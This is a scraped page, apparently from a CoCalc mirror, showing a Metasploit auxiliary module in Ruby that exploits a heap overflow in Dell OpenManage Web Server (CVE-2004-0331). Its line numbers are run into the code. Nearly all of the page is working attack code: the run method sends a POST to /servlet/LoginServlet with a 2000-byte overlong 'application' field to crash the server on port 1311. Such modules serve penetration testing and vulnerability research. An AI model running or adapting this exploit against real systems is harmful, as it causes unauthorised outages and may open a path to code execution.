Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/dos/http/dell_openmanage_post.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(update_info(info,11'Name' => 'Dell OpenManage POST Request Heap Overflow (win32)',12'Description' => %q{13This module exploits a heap overflow in the Dell OpenManage14Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability15exists due to a boundary error within the handling of POST requests,16where the application input is set to an overly long file name.17This module will crash the web server, however it is likely exploitable18under certain conditions.19},20'Author' => [ 'aushack' ],21'License' => MSF_LICENSE,22'References' =>23[24[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-02/0650.html' ],25[ 'BID', '9750' ],26[ 'OSVDB', '4077' ],27[ 'CVE', '2004-0331' ],28],29'DisclosureDate' => '2004-02-26'))3031register_options(32[33Opt::RPORT(1311),34OptBool.new('SSL', [true, 'Use SSL', true]),35],36self.class)37end3839def run40connect4142foo = "user=user&password=password&domain=domain&application=" + Rex::Text.pattern_create(2000)4344sploit = "POST /servlet/LoginServlet?flag=true HTTP/1.0\r\n"45sploit << "Content-Length: #{foo.length}\r\n\r\n"46sploit << foo4748sock.put(sploit +"\r\n\r\n")4950disconnect51end52end535455